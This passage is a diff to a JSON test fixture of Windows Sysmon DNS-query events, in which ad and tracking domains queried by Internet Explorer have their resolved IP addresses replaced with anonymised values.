Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692882700Z'/\u003e\u003cEventRecordID\u003e147\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.274\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.adform.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 track-eu.adformnet.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" 
@@ -5149,7 +5149,7 @@ "ProcessId": "2736", "QueryName": "cm.adform.net", "QueryStatus": "0", - "QueryResults": "type: 5 track-eu.adformnet.akadns.net;::ffff:37.157.2.239;::ffff:37.157.6.253;::ffff:37.157.2.238;::ffff:37.157.4.25;::ffff:37.157.4.24;::ffff:37.157.6.247;" + "QueryResults": "type: 5 track-eu.adformnet.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;" }, "channel": "Microsoft-Windows-Sysmon/Operational", "event_id": "22", 
@@ -5166,7 +5166,7 @@ { "@timestamp": "2021-05-05T15:30:51.706Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692891900Z'/\u003e\u003cEventRecordID\u003e148\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.302\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edm.hybrid.ai\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:37.18.16.16;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692891900Z'/\u003e\u003cEventRecordID\u003e148\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.302\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edm.hybrid.ai\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -5183,7 +5183,7 @@ "ProcessId": "2736", "QueryName": "dm.hybrid.ai", "QueryStatus": "0", - "QueryResults": "::ffff:37.18.16.16;", + "QueryResults": "::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "event_id": "22", 
@@ -5214,7 +5214,7 @@ "ProcessId": "2736", "QueryName": "static.adsafeprotected.com", "QueryStatus": "0", - "QueryResults": "type: 5 anycast.static.adsafeprotected.com;::ffff:199.166.0.32;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 anycast.static.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", 
@@ -5241,7 +5241,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692904200Z'/\u003e\u003cEventRecordID\u003e149\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.304\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.static.adsafeprotected.com;::ffff:199.166.0.32;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692904200Z'/\u003e\u003cEventRecordID\u003e149\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.304\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.static.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" 
@@ -5253,7 +5253,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692920100Z'/\u003e\u003cEventRecordID\u003e150\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.322\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etrc.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;::ffff:151.101.66.2;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692920100Z'/\u003e\u003cEventRecordID\u003e150\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.322\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etrc.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -5265,7 +5265,7 @@ "ProcessId": "2736", "QueryName": "trc.taboola.com", "QueryStatus": "0", - "QueryResults": "type: 5 f2.taboola.map.fastly.net;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;::ffff:151.101.66.2;", + "QueryResults": "type: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", 
@@ -5295,7 +5295,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692935200Z'/\u003e\u003cEventRecordID\u003e151\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.379\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epippio.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:107.178.254.65;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692935200Z'/\u003e\u003cEventRecordID\u003e151\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.379\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epippio.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -5317,7 +5317,7 @@ "ProcessId": "2736", "QueryName": "pippio.com", "QueryStatus": "0", - "QueryResults": "::ffff:107.178.254.65;", + "QueryResults": "::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "opcode": "Info", 
@@ -5337,7 +5337,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692997300Z'/\u003e\u003cEventRecordID\u003e152\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.482\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel-sync.sitescout.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pixel-a.sitescout.com;::ffff:209.15.36.34;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692997300Z'/\u003e\u003cEventRecordID\u003e152\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.482\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel-sync.sitescout.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pixel-a.sitescout.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -5354,7 +5354,7 @@ "ProcessId": "2736", "QueryName": "pixel-sync.sitescout.com", "QueryStatus": "0", - "QueryResults": "type: 5 pixel-a.sitescout.com;::ffff:209.15.36.34;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;" + "QueryResults": "type: 5 pixel-a.sitescout.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;" }, "user": { "identifier": "S-1-5-18" @@ -5387,7 +5387,7 @@ "ProcessId": "2736", "QueryName": "prod.y-medialink.com", "QueryStatus": "0", - "QueryResults": "::ffff:35.186.202.217;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;", + "QueryResults": "::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "event_id": "22", 
@@ -5409,7 +5409,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693010700Z'/\u003e\u003cEventRecordID\u003e153\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.502\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprod.y-medialink.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.186.202.217;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693010700Z'/\u003e\u003cEventRecordID\u003e153\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.502\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprod.y-medialink.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" 
@@ -5427,7 +5427,7 @@ "time_created": "2019-07-18T03:34:04.693Z", "level": "information", "event_data": { - "QueryResults": "type: 5 jadserve.postrelease.com.akadns.net;::ffff:54.80.117.178;::ffff:3.217.22.176;::ffff:35.153.215.15;::ffff:52.207.54.164;::ffff:52.204.186.237;::ffff:52.86.46.105;", + "QueryResults": "type: 5 jadserve.postrelease.com.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.507", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
